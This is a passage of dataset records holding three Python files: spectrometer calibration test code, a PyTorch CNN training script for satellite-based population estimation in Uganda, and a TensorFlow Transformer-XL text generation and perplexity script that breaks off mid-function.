%.3f StepSize %.3f\\n\" % \\\n (self.spec.fStart, self.spec.fStop, self.spec.df))\n print(\"New file opened %s,ambientCount = %d\" % (fileName,ambientCount))\n fp.write(\"%.3f \" % (time.time()))\n self.hotVals.tofile(fp, sep=\" \", format=\"%.1f\")\n fp.write(\"\\n\")\n noCal = False\n skyStarted = False\n else:\n# wait for ambient load completely out\n loadPos = self.spec.dio.read(1)\n if loadPos != 2:\n if skyStarted:\n noCal = True\n else:\n time.sleep(0.1)\n continue\n# collect and write out 10 sky measurements\n skyCount = 0\n if skyStarted == False:\n print(\"Starting sky observations\")\n time.sleep(0.5)\n while self.spec.sweep(checkAmbientLoad=True):\n if skyCount == 0:\n skyStarted = True\n coldVals = self.spec.vals.copy()\n else:\n coldVals = coldVals + self.spec.vals\n skyCount += 1\n if skyCount == 15:\n self.coldVals = coldVals/skyCount-self.spec.zeros\n fp.write(\"%.3f \" % (time.time()))\n self.coldVals.tofile(fp, sep=\" \", format=\"%.1f\")\n fp.write(\"\\n\")\n fp.flush()\n skyCount = 0\n if verbose:\n print(\"Recording a sky scan\", end = \" \")\n self.calcTsys()\n\n# Calculate the average Tsys over 2 GHz bands. 
Since I want to average Tsys,\n# I sill calculate the inverse of Y.\n# Average the low band from 4.5-6 GHz and the others over a full 2 GHz band\n def calcTsys(self):\n y = self.hotVals/self.coldVals\n fLow = 4.5\n i = 0\n for fHigh in range(6,17,2):\n chLow = int((fLow-self.spec.fStart)/self.spec.df)\n chHigh = int((fHigh-self.spec.fStart)/self.spec.df)\n self.Tsys[i] = 293/(np.mean(y[chLow:chHigh]) - 1)\n fLow = fHigh\n i += 1\n for v in self.Tsys:\n print(\"%.1f\" % (v), end = \" \")\n print()\n\n def checkDIO(self):\n new = self.spec.dio.read(1)\n old = -1\n while True:\n new = self.spec.dio.read(1)\n if new != old:\n print(new)\n old = new\n\n def hot(self, numInts = 1):\n self.spec.sweep()\n self.hotVals = self.spec.vals.copy()\n if numInts > 1:\n for i in range(numInts-1):\n self.spec.sweep()\n self.hotVals = self.hotVals + self.spec.vals\n# print \"i =%d val = %d hotVal = %d\" % (i, self.spec.vals[0], self.hotVals[0])\n self.hotVals = self.hotVals/numInts\n self.hotVals = self.hotVals - self.spec.zeros\n if self.spec.doPlot:\n plt.clf()\n plt.plot(self.spec.freqs, self.hotVals)\n plt.show(block = False)\n\n def cold(self, numInts = 1):\n self.spec.sweep()\n self.coldVals = self.spec.vals.copy()\n if numInts > 1:\n for i in range(numInts-1):\n self.spec.sweep()\n self.coldVals = self.coldVals + self.spec.vals\n# print \"i =%d val = %d coldVal = %d\" % (i, self.spec.vals[240], self.coldVals[240])\n self.coldVals = self.coldVals / numInts\n self.coldVals = self.coldVals - self.spec.zeros\n if self.spec.doPlot:\n plt.plot(self.spec.freqs, self.coldVals)\n plt.show(block = False)\n \n def zero(self):\n avg = np.zeros(self.spec.nSamp)\n \n self.spec.amplifierPower(0)\n for i in range(5):\n self.spec.sweep()\n avg = avg + self.spec.vals\n avg = avg / 5\n self.spec.amplifierPower(1)\n self.zeroFit = np.polyfit(self.spec.freqs[20:],avg[20:],1)\n self.spec.zeros = np.polyval(self.zeroFit, self.spec.freqs)\n if self.spec.doPlot:\n plt.plot(self.spec.freqs,avg, self.spec.freqs, self.spec.zeros)\n plt.show(block = False)\n print(\"Fit const = %.1f slope %.2f std = %.2f\" % \\\n ( self.zeroFit[1], self.zeroFit[0], np.std(avg-self.spec.zeros)))\n \n def saveZero(self, fname=\"zeroParams\"):\n fn = '/instance/configFiles/' + fname + ( \"%d\" % (self.spec.number))\n# fd = open(fn, 'w')\n# fd.write(\"%.3f %.3f\" % (test.zeroFit[0], self.zeroFit[1]))\n np.savetxt(fn, self.zeroFit, \"%.3f\")\n\n def readZero(self, fname=\"zeroParams\"):\n fn = '/instance/configFiles/' + fname + ( \"%d\" % (self.spec.number))\n# fn = \"/home/smauser/\"+fname+\"%d\" % (self.spec.number)\n# fd = open(fn, 'r')\n self.zeroFit = np.genfromtxt(fn)\n freq = self.spec.fStart\n for i in range(self.spec.nSamp):\n self.spec.freqs[i] = freq\n freq += self.spec.df\n self.spec.zeros = np.polyval(self.zeroFit, self.spec.freqs)\n\n def Y(self, fname=\"Y.txt\"):\n Y = (self.hotVals)/(self.coldVals)\n np.savetxt(fname, np.c_[self.spec.freqs, self.hotVals, self.coldVals, Y], fmt = \"%.3f %d %d %.3f\")\n if self.spec.doPlot:\n plt.clf()\n plt.plot(self.spec.freqs, Y)\n plt.draw()\n","sub_path":"online/Linux/applications/pi/ScanningSpectrometer/test_spectrometer.py","file_name":"test_spectrometer.py","file_ext":"py","file_size_in_byte":10168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
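calcTsys() in the record above applies a standard Y-factor estimate per band. A standalone sketch of the formula (tsys_from_y is a hypothetical helper; 293 K is the ambient temperature the source uses):

import numpy as np

def tsys_from_y(hot, cold, t_amb=293.0):
    # Y-factor method: Y = P_hot / P_cold, Tsys = T_ambient / (Y - 1),
    # with Y averaged across the band as in calcTsys().
    y = np.asarray(hot, dtype=float) / np.asarray(cold, dtype=float)
    return t_amb / (np.mean(y) - 1.0)

print(tsys_from_y([200.0, 210.0], [100.0, 105.0]))  # Y = 2 everywhere -> 293.0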
+{"seq_id":"117131189","text":"import tqdm\nimport time\nimport sys\nimport re\nimport os\nimport gdal\nimport json\nimport argparse\nimport shutil\nimport inspect\nimport itertools\nimport csv\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom torchvision import models\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom torch.utils.data import Dataset, DataLoader, random_split, Subset\nimport random\nimport cProfile\nimport pstats\nfrom CNN_Uganda_ConvNet import CNN\n'''\nThis training script is adopted from train_Uganda and fit to the purpose of only training a CNN on interferometric coherence band.\nFor more detaisl refer to the Technical report and train_Uganda script \nScript by Johanna Kauffert\n'''\n\nmapdir = \"/exports/eddie/scratch/s1937352\"\nlogdir = \"/exports/eddie/scratch/s1937352/logs\"\n\n\nclass FileDataset(Dataset):\n \"\"\"\n This class combines Population data and image data to feed it into the CNN. \n The image data is a 8 dimensional numpy array that is calculated based on the entries of the \n dictionary.\n \"\"\"\n\n images = ['Coherence','vv', 'vh', 'S2']\n bands = ['B4', 'B3', 'B2', 'B8', 'B11', 'vv', 'vh', 'Coherence']\n \n def __init__(self,dictionary):\n # create a list with all keys that have data in all bands\n self.keys_list = []\n with open(f'{mapdir}/{dictionary}') as json_file:\n self.dictTiles = json.load(json_file)\n\n for element in self.dictTiles:\n if self.dictTiles[element].get(\"pop\") != None:\n if self.dictTiles[element].get(\"S2\") != None:\n if self.dictTiles[element].get(\"vv\") != None:\n if self.dictTiles[element].get(\"vh\") != None:\n if self.dictTiles[element].get(\"Coherence\") != None:\n self.keys_list.append(element)\n \n #check how long the list is\n print(len(self.keys_list))\n \n #get width and height of a tile so that it can be further used\n for i in self.keys_list:\n imgdir = self.dictTiles[i][\"S2\"]\n coords = self.dictTiles[i][\"extent\"]\n tile = gdal.Translate('',\n imgdir,\n projWin=coords,\n format='VRT')\n tile_arr = tile.ReadAsArray()\n self.S2bands, self.width, self.height = tile_arr.shape\n print(self.S2bands, self.width, self.height)\n break\n \n #shuffle the list so that tiles next to each other are apart\n random.seed(430)\n random.shuffle(self.keys_list)\n \n def __len__(self):\n #function needed by PyTorch\n return len(self.keys_list)\n\n def __getitem__(self,idx):\n # here is more information about this:\n #https://pytorch.org/tutorials/beginner/data_loading_tutorial.html\n\n #get the key for the dict\n key = self.keys_list[idx]\n coords = self.dictTiles[key][\"extent\"]\n pop = self.dictTiles[key][\"pop\"]\n pops = np.array(pop, dtype=np.float32)\n pop = pops\n\n #create empty 8D list\n return_img = np.empty((1, self.width, self.height), dtype=np.float32)\n\n #loop thorugh the image names to generate the array from different images\n for band_id, band_name in enumerate(self.images):\n #get the imagedir\n imgdir = self.dictTiles[key][self.images[band_id]]\n\n if band_id == 0:\n tile = gdal.Translate('',\n imgdir,\n projWin=coords,\n format='VRT')\n tile_arr = tile.ReadAsArray()\n return_img[0, :, :] = tile_arr\n\n else:\n continue\n\n return return_img, pop\n\n\ndef mse(out, y):\n loss = F.mse_loss(out, y)\n acc = float(np.sqrt(loss.data.item()))\n return loss, acc\n '''\n #Creates a criterion that measures the mean \n #squared error (squared L2 norm) between each element in the input xx and target yy .\n #das vllt mal testen\n criterion = 
nn.MSELoss()\n loss = torch.sqrt(criterion(x, y))\n loss.backward()\n print(x.grad)\n '''\n\ndef l1(out, y):\n loss = F.l1_loss(out, y)\n acc = loss.data.item()\n return loss, acc\n\n\ndef smooth(out, y):\n '''\n Creates a criterion that uses a squared term if the absolute element-wise error \n falls below 1 and an L1 term otherwise. It is less sensitive to outliers than\n the MSELoss and in some cases prevents exploding gradients\n '''\n loss = F.smooth_l1_loss(out, y)\n acc = loss.data.item()\n return loss, acc\n\n\n\n\n\nclass Job(object):\n\n def __init__(\n self,\n exp_name,\n dataset=None,\n batch_size=64,\n seed=12345,\n num_layers=4,\n num_filters=128,\n num_epochs=5,\n learning_rate=1e-5,\n dropout_rate=0.1,\n l2=0.2,\n kernel_size=5,\n loss_fn=smooth,\n early_stop_mem=0,\n alt_cnn=False,\n kfold=0,\n start=0,\n small = False,\n parish = 3\n ):\n self.exp_name = exp_name\n self.dataset = dataset\n self.batch_size = batch_size\n self.seed = seed\n self.num_layers = num_layers\n self.num_filters = num_filters\n self.kernel_size = kernel_size\n self.num_epochs = num_epochs\n self.learning_rate = learning_rate\n self.dropout_rate = dropout_rate\n self.l2 = l2\n self.loss_fn = loss_fn\n self.early_stop_mem = early_stop_mem\n self.alt_cnn = alt_cnn\n self.kfold = kfold\n self.params = locals()\n self.start = start\n self.small = small\n self.parish = parish\n\n del self.params['self']\n del self.params['dataset']\n self.params['loss_fn'] = self.params['loss_fn'].__name__\n\n self.train_duration = None\n self.best_loss = (\"-1\", float(\"inf\"), float(\"inf\"))\n\n self.jobpath = self.initialise_log_dir()\n\n self.device = self.initialise_pytorch()\n if self.parish == 0:\n self.train, self.val, self.data_shape= self.initialise_datasets_parish_train()\n elif self.parish == 1:\n self.test, self.data_shape = self.initialise_datasets_parish_test()\n else:\n self.train, self.val, self.test, self.data_shape = self.initialise_datasets_orig()\n\n #self.train, self.val, self.test, self.data_shape = self.initialise_datasets_orig()\n self.model = self.initialise_cnn()\n self.optimiser = optim.Adam(self.model.parameters(),\n lr=self.learning_rate,\n weight_decay=self.l2)\n\n def save_model(self):\n # Save the model to disk\n self.model.cpu()\n torch.save(self.model, \"{}/model.pt\".format(self.jobpath))\n self.model.to(self.device)\n\n def train_model(self):\n # Perform training on the model\n train_start_time = time.time()\n best_val_loss = float(\"inf\")\n for i in range(self.start, self.start + self.num_epochs, 1):\n train_losses = 0.0\n print(\"I am here\")\n self.model.train()\n with tqdm.tqdm(total=len(self.train) * self.train.batch_size) as bar:\n bar.set_description(\"Training |Epoch {}\".format(i))\n for j, (x, y) in enumerate(self.train):\n x, y = [torch.Tensor(z).to(device=self.device) for z in [x, y]]\n self.optimiser.zero_grad()\n out = self.model.forward(x).view(-1)\n #print(out)\n loss, acc = self.loss_fn(out, y)\n #print(loss,acc)\n train_losses += acc\n loss.backward()\n self.optimiser.step()\n bar.update(self.train.batch_size)\n val_losses = self.validate_model(i)\n train_loss = train_losses / len(self.train)\n val_loss = val_losses / len(self.val)\n if val_loss < self.best_loss[2]:\n self.best_loss = (i, train_loss, val_loss)\n elif (self.early_stop_mem != 0 and i - self.best_loss[0] >= self.early_stop_mem):\n break\n print(\"Training |RMS loss {} : {:0.2f}\".format(i, train_loss))\n print(\"Validation|RMS loss {} : {:0.2f}\\n\".format(i, val_loss))\n best_val_loss = 
self.record_data(i, train_loss, val_loss, best_val_loss)\n print(*self.best_loss)\n self.train_duration = (time.time() - train_start_time)/60\n t_ofile = '{}/duration.txt'.format(self.jobpath)\n\n with open(t_ofile, 'w') as f:\n f.write(str(self.train_duration))\n\n def validate_model(self, epoch):\n # Perform validation on the model\n losses = 0.0\n self.model.eval()\n with tqdm.tqdm(total=len(self.val) * self.val.batch_size) as bar:\n bar.set_description(\"Validation|Epoch {}\".format(epoch))\n for j, (x, y) in enumerate(self.val):\n x, y = [torch.Tensor(z).to(device=self.device) for z in [x, y]]\n out = self.model.forward(x)\n loss = F.l1_loss(out, y).view(-1)\n losses += loss.data.item()\n bar.update(self.val.batch_size)\n return losses\n\n def record_data(self, epoch, train_loss, val_loss, best_val_loss):\n # Record training data to the current job's log file\n ofile = '{}/data.csv'.format(self.jobpath)\n with open(ofile, 'a') as f:\n writer = csv.writer(f)\n if epoch == 0:\n writer.writerow(['epoch', 'train_loss', 'val_loss'])\n writer.writerow([epoch, train_loss, val_loss])\n if best_val_loss > val_loss:\n best_val_loss = val_loss\n self.save_model()\n return best_val_loss\n\n def initialise_cnn(self):\n # Set up the model to be trained, either by loading an existing model\n # or creating one from scratch.\n if self.start == 0:\n if self.alt_cnn:\n model = models.vgg11(pretrained=False)\n num_fts = model.classifier[6].in_features\n model.classifier[6] = nn.Linear(num_fts, 1)\n else:\n data_shape = (self.batch_size, self.data_shape[0], self.data_shape[1],\n self.data_shape[2])\n model = CNN(data_shape, self.num_layers, self.num_filters, self.dropout_rate,\n self.kernel_size)\n \n elif os.path.exists(f\"{self.jobpath}/model.pt\"):\n model = torch.load(\"{}/model.pt\".format(self.jobpath))\n \n \n \n else:\n data_shape = (self.batch_size, self.data_shape[0], self.data_shape[1], self.data_shape[2])\n model = CNN(data_shape, self.num_layers, self.num_filters, self.dropout_rate, self.kernel_size)\n\n\n model.to(self.device)\n return model\n\n\n\n\n def initialise_datasets_parish_train(self):\n if self.dataset is None:\n self.dataset = FileDataset()\n data_shape = self.dataset[0][0].shape\n len_orig = len(self.dataset)\n split_lengths = [int(0.15 * len(self.dataset))]\n split_lengths = [len(self.dataset) - sum(split_lengths)] + split_lengths\n sets = random_split(self.dataset, split_lengths)\n train, val, = [\n DataLoader(x, batch_size=b, shuffle=True, pin_memory=True, num_workers=4)\n for x, b in zip(sets, [self.batch_size, self.batch_size])\n ]\n return train, val, data_shape\n\n def initialise_datasets_parish_test(self):\n if self.dataset is None:\n self.dataset = FileDataset()\n data_shape = self.dataset[0][0].shape\n\n test = DataLoader(self.dataset, batch_size=b, shuffle=True, pin_memory=True, num_workers=4)\n\n return test, data_shape\n\n def initialise_datasets_orig(self):\n # Initialise data, partitioning randomly into 80% train, 10% val, 10% t$\n if self.dataset is None:\n self.dataset = FileDataset()\n data_shape = self.dataset[0][0].shape\n len_orig = len(self.dataset)\n if self.small:\n\n slit_half = [int(0.25 * len(self.dataset))]*4\n dataset,d2,d3,d4 = random_split(self.dataset, slit_half)\n #datatset = dataset[0]\n print(len(dataset))\n split_length = [int(0.2*len(dataset))]*2\n split_length = [len(dataset)-sum(split_length)]+split_length\n sets = random_split(dataset, split_length)\n\n else:\n #make a list of twice 10 % of the dataset length\n split_lengths = [int(0.1 * 
len(self.dataset))] * 2\n # add to the list 80% of the dataset length\n split_lengths = [len(self.dataset) - sum(split_lengths)] + split_lengths\n # randomly split the dataset into 80/10/10\n sets = random_split(self.dataset, split_lengths)\n\n train, val, test = [\n DataLoader(x, batch_size=b, shuffle=True, pin_memory=True, num_workers=4)\n for x, b in zip(sets, [self.batch_size, self.batch_size, 1])\n ]\n return train, val, test, data_shape\n\n def initialise_log_dir(self):\n # Set up a log directory for the current job.\n print(logdir)\n jobpath = f'{logdir}/{self.exp_name}'\n print(jobpath)\n\n if self.start == 0:\n if os.path.isdir(jobpath):\n shutil.rmtree(jobpath)\n os.mkdir(jobpath)\n elif not os.path.isdir(jobpath):\n os.mkdir(jobpath)\n with open(\"{}/paramfile.json\".format(jobpath), 'w') as f:\n f.write(json.dumps(self.params))\n return jobpath\n\n def initialise_pytorch(self):\n # Set up pytorch parameters.\n torch.manual_seed(self.seed)\n if torch.cuda.is_available():\n print(\"Training CNN with GPU\")\n return torch.device('cuda')\n else:\n print(\"Training CNN with CPU\")\n return torch.device('cpu')\n\n\nclass JobScheduler(object):\n\n def __init__(self, dict):\n self.dataset = FileDataset(dict)\n\n def name(self, val):\n return val.__name__ if hasattr(val, \"__name__\") else str(val)\n\n def train_model_list(self, log_name, num_epochs, start, learnr, small, l2, parish):\n # Train a number of specified jobs; resume from the recorded epoch when the log dir already exists.\n if os.path.isdir(f'{logdir}/{log_name}'):\n with open(f'{logdir}/{log_name}/paramfile.json') as json_file:\n paramdict = json.load(json_file)\n start = paramdict.get(\"start\")\n num_epochs = paramdict.get(\"num_epochs\")\n start = start + num_epochs\n\n jobs = [\n Job(log_name,\n dataset=self.dataset,\n num_epochs=num_epochs,\n early_stop_mem=0,\n kfold=0,\n loss_fn=smooth,\n learning_rate=learnr,\n start=start,\n l2=l2,\n small=small,\n parish=parish)]\n\n for i, job in enumerate(jobs):\n job.train_model()\n\n\ndef readCommands():\n '''\n Read command-line arguments\n '''\n p = argparse.ArgumentParser(description=(\"Get parameters for training the CNN\"))\n p.add_argument(\"--log_name\", dest=\"log_name\", type=str, default=\"CNN_number\", help=(\"Specify a name for the CNN\"))\n p.add_argument(\"--num_epochs\", dest=\"num_epochs\", type=int, default=20, help=(\"Number of epochs\"))\n p.add_argument(\"--start\", dest=\"start\", type=int, default=0, help=(\"Specify an epoch number to start from\"))\n p.add_argument(\"--learning-rate\", dest=\"learning_rate\", type=float, default=0.00001, help=(\"Specify a learning rate\"))\n p.add_argument(\"--l2\", dest=\"l2\", type=float, default=0.01, help=(\"Specify l2\"))\n p.add_argument(\"--parish\", dest=\"parish\", type=int, default=0, help=(\"Train on parish (0: train, 1: test), or train on the whole dictionary (3)\"))\n p.add_argument(\"--dict\", dest=\"dict\", type=str, default=\"dictionary_p2.json\", help=(\"Specify a dictionary that will be used\"))\n p.add_argument(\"--smalldata\", dest=\"small\", action=\"store_true\", help=(\"Use small dataset\"))\n cmdargs = p.parse_args()\n return cmdargs\n\n\ndef main():\n cmd = readCommands()\n log_name = cmd.log_name\n num_epochs = cmd.num_epochs\n start = cmd.start\n learnr = cmd.learning_rate\n dict = cmd.dict\n small = cmd.small\n parish = cmd.parish\n l2 = cmd.l2\n js = JobScheduler(dict)\n js.train_model_list(log_name, num_epochs, start, learnr, small, l2, parish)\n\n\nif __name__ == \"__main__\":\n\n PROFILE = 'process.profile'\n prf = cProfile.run('main()', PROFILE)\n\n p = 
pstats.Stats(PROFILE)\n p.sort_stats('cumtime').print_stats(20)\n","sub_path":"CNN/Coherence_CNN.py","file_name":"Coherence_CNN.py","file_ext":"py","file_size_in_byte":16906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
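The 80/10/10 partition in initialise_datasets_orig() above follows a "remainder first" pattern so the three lengths always sum exactly to the dataset size. A toy illustration on a synthetic TensorDataset (shapes and batch size are illustrative, not the satellite data):

import torch
from torch.utils.data import TensorDataset, DataLoader, random_split

data = TensorDataset(torch.randn(100, 1, 8, 8), torch.rand(100))
lengths = [int(0.1 * len(data))] * 2
lengths = [len(data) - sum(lengths)] + lengths  # [80, 10, 10]
train_set, val_set, test_set = random_split(data, lengths)
train = DataLoader(train_set, batch_size=16, shuffle=True)
print(len(train_set), len(val_set), len(test_set))  # 80 10 10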
+{"seq_id":"533300042","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport re\nimport math\nimport time\nfrom absl import flags\nfrom progressbar import ProgressBar\nimport absl.logging as _logging # pylint: disable=unused-import\n\nimport tensorflow as tf\nimport model\nimport data_utils\nfrom vocabulary import Vocab\nfrom gpu_utils import assign_to_gpu, average_grads_and_vars\nfrom postprocess import top_one_result, top_n_prob, gen_on_keyword, gen_diversity\nimport numpy as np\nimport multiprocessing\nimport random\nimport csv\nimport pandas as pd\n\n# GPU config\nflags.DEFINE_integer(\"num_core_per_host\", default=8, help=\"Number of cores per host\")\nflags.DEFINE_integer(\"multiprocess\", default=2, lower_bound=1, help=\"Number of processes\")\n\n# Experiment (data/checkpoint/directory) config\nflags.DEFINE_string(\"corpus_info_path\", default=\"\", help=\"Path to corpus-info.json file.\")\nflags.DEFINE_string(\"model_dir\", default=None, help=\"Estimator model_dir.\")\nflags.DEFINE_string(\"dataset\", \"tmall\", help=\"Dataset name.\")\nflags.DEFINE_string(\"input_file_dir\", default=None, help=\"Input file_dir.\")\nflags.DEFINE_string(\"output_file_dir\", default=None, help=\"Output file_dir.\")\nflags.DEFINE_bool(\"do_sent_gen\", default=False, help=\"Whether to predict next word probability.\")\nflags.DEFINE_bool(\"do_sent_ppl_pred\", default=False, help=\"Whether to predict sentence perplexity.\")\nflags.DEFINE_integer(\"limit_len\", default=50, help=\"Limited length of input sentence.\")\nflags.DEFINE_integer(\"gen_len\", default=30, help=\"Number of token to generate.\")\nflags.DEFINE_integer(\"pred_batch_size\", default=16, help=\"Size of predition batch.\")\n\n# Model config\nflags.DEFINE_integer(\"mem_len\", default=10, help=\"Number of steps to cache\")\nflags.DEFINE_bool(\"same_length\", default=False, help=\"Same length attention\")\nflags.DEFINE_integer(\"clamp_len\", default=-1, help=\"Clamp length\")\nflags.DEFINE_integer(\"n_layer\", default=6, help=\"Number of layers.\")\nflags.DEFINE_integer(\"d_model\", default=500, help=\"Dimension of the model.\")\nflags.DEFINE_integer(\"d_embed\", default=500, help=\"Dimension of the embeddings.\")\nflags.DEFINE_integer(\"n_head\", default=10, help=\"Number of attention heads.\")\nflags.DEFINE_integer(\"d_head\", default=50, help=\"Dimension of each attention head.\")\nflags.DEFINE_integer(\"d_inner\", default=1000, help=\"Dimension of inner hidden size in positionwise feed-forward.\")\nflags.DEFINE_float(\"dropout\", default=0.1, help=\"Dropout rate.\")\nflags.DEFINE_float(\"dropatt\", default=0.1, help=\"Attention dropout rate.\")\nflags.DEFINE_bool(\"untie_r\", default=False, help=\"untie r_w_bias and r_r_bias\")\n\n# Adaptive Softmax / Embedding\nflags.DEFINE_integer(\"div_val\", default=1, help=\"Divide the embedding size by this val for each bin\")\nflags.DEFINE_bool(\"proj_share_all_but_first\", default=False,\n help=\"True to share all but first projs, False not to share.\")\nflags.DEFINE_bool(\"proj_same_dim\", default=True, help=\"Project the bin with the same dimension.\")\n\n# Parameter initialization\nflags.DEFINE_enum(\"init\", default=\"normal\", enum_values=[\"normal\", \"uniform\"], help=\"Initialization method.\")\nflags.DEFINE_float(\"init_std\", default=0.02, help=\"Initialization std when init is normal.\")\nflags.DEFINE_float(\"proj_init_std\", default=0.01, help=\"Initialization std for embedding 
projection.\")\nflags.DEFINE_float(\"init_range\", default=0.1, help=\"Initialization std when init is uniform.\")\n\nFLAGS = flags.FLAGS\n\ndef sent_gen(tmp_Vocab, input_txt, n_token, cutoffs, ps_device):\n\n test_list = tf.placeholder(tf.int64, shape=[1, None])\n dataset = tf.data.Dataset.from_tensors(test_list)\n # dataset = dataset.batch(1, drop_remainder=True)\n\n iterator = dataset.make_initializable_iterator()\n input_feed = iterator.get_next()\n\n inputs = tf.split(input_feed, FLAGS.num_core_per_host, 0)\n\n per_core_bsz = 1\n tower_mems, tower_losses, tower_new_mems = [], [], []\n tower_output = []\n tower_mems_id = []\n tower_new_mems_id = []\n tower_attn_prob = []\n\n for i in range(FLAGS.num_core_per_host):\n with tf.device(assign_to_gpu(i, ps_device)), \\\n tf.variable_scope(tf.get_variable_scope(), reuse=tf.AUTO_REUSE):\n mems_i = [tf.placeholder(tf.float32,\n [FLAGS.mem_len, per_core_bsz, FLAGS.d_model])\n for _ in range(FLAGS.n_layer)]\n\n mems_i_id = [tf.placeholder(tf.int64,\n [FLAGS.mem_len, per_core_bsz])\n for _ in range(FLAGS.n_layer)]\n\n new_mems_i, output_i, new_mems_i_id, attn_prob_i = single_core_graph_for_inference(\n n_token=n_token,\n cutoffs=cutoffs,\n is_training=False,\n inp=inputs[i],\n mems=mems_i,\n mems_id=mems_i_id)\n\n tower_mems.append(mems_i)\n tower_new_mems.append(new_mems_i)\n tower_output.append(output_i)\n tower_mems_id.append(mems_i_id)\n tower_new_mems_id.append(new_mems_i_id)\n tower_attn_prob.append(attn_prob_i)\n\n # Evaluation loop\n tower_mems_np = [\n [np.zeros([FLAGS.mem_len, per_core_bsz, FLAGS.d_model], dtype=np.float32)\n for layer in range(FLAGS.n_layer)]\n for core in range(FLAGS.num_core_per_host)\n ]\n\n tower_mems_id_np = [\n [np.zeros([FLAGS.mem_len, per_core_bsz], dtype=np.float32)\n for layer in range(FLAGS.n_layer)]\n for core in range(FLAGS.num_core_per_host)\n ]\n\n saver = tf.train.Saver()\n\n with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:\n sess.run(tf.global_variables_initializer())\n\n eval_ckpt_path = tf.train.latest_checkpoint(FLAGS.model_dir)\n\n saver.restore(sess, eval_ckpt_path)\n\n if input_txt == \"\":\n txt_gen = tmp_Vocab.get_sym(random.randint(3, len(tmp_Vocab.idx2sym) - 1))\n else:\n txt_gen = input_txt\n\n fetches = [tower_new_mems,\n tower_output,\n tower_new_mems_id,\n tower_attn_prob,\n 'transformer/adaptive_embed/lookup_table:0']\n\n encoded_input = tmp_Vocab.encode_sents(txt_gen, ordered=True)\n\n progress = ProgressBar()\n for _ in progress(range(FLAGS.gen_len)):\n time.sleep(0.01)\n feed_dict = {}\n for i in range(FLAGS.num_core_per_host):\n for m, m_np in zip(tower_mems[i], tower_mems_np[i]):\n feed_dict[m] = m_np\n\n for id, id_np in zip(tower_mems_id[i], tower_mems_id_np[i]):\n feed_dict[id] = id_np\n\n sess.run(iterator.initializer, feed_dict={test_list: [encoded_input]})\n fetched = sess.run(fetches, feed_dict=feed_dict)\n\n tower_mems_np, output = fetched[:2]\n\n tower_mems_id_np = fetched[2]\n\n tmp_list = output[0][-1][0]\n tmp_list = tmp_list.tolist()\n\n index = top_one_result(tmp_list)\n\n txt_gen += tmp_Vocab.get_sym(index)\n if tmp_Vocab.get_sym(index) == \"\":\n break\n else:\n encoded_input = [index]\n\n return txt_gen\n\n\ndef sent_ppl(input_txt_list, n_token, cutoffs, ps_device):\n\n test_list = tf.placeholder(tf.int64, shape=[FLAGS.pred_batch_size, None])\n dataset = tf.data.Dataset.from_tensors(test_list)\n # dataset = dataset.batch(1, drop_remainder=True)\n\n iterator = dataset.make_initializable_iterator()\n input_feed = iterator.get_next()\n\n 
inputs = tf.split(input_feed, FLAGS.num_core_per_host, 0)\n\n per_core_bsz = FLAGS.pred_batch_size\n tower_mems, tower_new_mems = [], []\n tower_output = []\n tower_mems_id = []\n tower_new_mems_id = []\n tower_attn_prob = []\n\n for i in range(FLAGS.num_core_per_host):\n with tf.device(assign_to_gpu(i, ps_device)), \\\n tf.variable_scope(tf.get_variable_scope(), reuse=tf.AUTO_REUSE):\n mems_i = [tf.placeholder(tf.float32,\n [FLAGS.mem_len, per_core_bsz, FLAGS.d_model])\n for _ in range(FLAGS.n_layer)]\n\n mems_i_id = [tf.placeholder(tf.int64,\n [FLAGS.mem_len, per_core_bsz])\n for _ in range(FLAGS.n_layer)]\n\n new_mems_i, output_i, new_mems_i_id, attn_prob_i = single_core_graph_for_inference(\n n_token=n_token,\n cutoffs=cutoffs,\n is_training=False,\n inp=inputs[i],\n mems=mems_i,\n mems_id=mems_i_id)\n\n tower_mems.append(mems_i)\n tower_new_mems.append(new_mems_i)\n tower_output.append(output_i)\n tower_mems_id.append(mems_i_id)\n tower_new_mems_id.append(new_mems_i_id)\n tower_attn_prob.append(attn_prob_i)\n\n # Evaluation loop\n tower_mems_np = [\n [np.zeros([FLAGS.mem_len, per_core_bsz, FLAGS.d_model], dtype=np.float32)\n for layer in range(FLAGS.n_layer)]\n for core in range(FLAGS.num_core_per_host)\n ]\n\n tower_mems_id_np = [\n [np.zeros([FLAGS.mem_len, per_core_bsz], dtype=np.float32)\n for layer in range(FLAGS.n_layer)]\n for core in range(FLAGS.num_core_per_host)\n ]\n\n saver = tf.train.Saver()\n\n #with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:\n gpu_config = tf.ConfigProto(allow_soft_placement=True)\n gpu_config.gpu_options.allow_growth = True # 按需分配内存\n gpu_config.gpu_options.per_process_gpu_memory_fraction = 0.2 # 限制单进程只能占用GPU显存一定比例\n with tf.Session(config=gpu_config) as sess:\n sess.run(tf.global_variables_initializer())\n\n eval_ckpt_path = tf.train.latest_checkpoint(FLAGS.model_dir)\n\n saver.restore(sess, eval_ckpt_path)\n\n fetches = [tower_new_mems,\n tower_output,\n tower_new_mems_id,\n tower_attn_prob,\n 'transformer/adaptive_embed/lookup_table:0']\n\n sent_ppl_list = [[] for _ in range(per_core_bsz)]\n\n def _cal_ppl(log_prob_list, sent_len):\n ### the first token of encoded txt is special token , so skip the first one\n log_prob = sum(log_prob_list[:sent_len-1])\n #pplx = pow(math.exp((-1)*log_prob), 1/(sent_len-1))\n ppl = math.exp((-1)*log_prob/(sent_len-1))\n\n return ppl\n\n for batch_id in range(input_txt_list[0].shape[1]):\n input_batch = input_txt_list[0][:,batch_id,:]\n input_lens = input_txt_list[1][:,batch_id]\n\n tower_mems_np = [\n [np.zeros([FLAGS.mem_len, per_core_bsz, FLAGS.d_model], dtype=np.float32)\n for layer in range(FLAGS.n_layer)]\n for core in range(FLAGS.num_core_per_host)\n ]\n\n tower_mems_id_np = [\n [np.zeros([FLAGS.mem_len, per_core_bsz], dtype=np.float32)\n for layer in range(FLAGS.n_layer)]\n for core in range(FLAGS.num_core_per_host)\n ]\n\n #print(\"Encoded Input:\", input_batch)\n\n log_probs = [[] for _ in range(per_core_bsz)]\n\n for token in range(1, input_batch.shape[-1]):\n feed_dict = 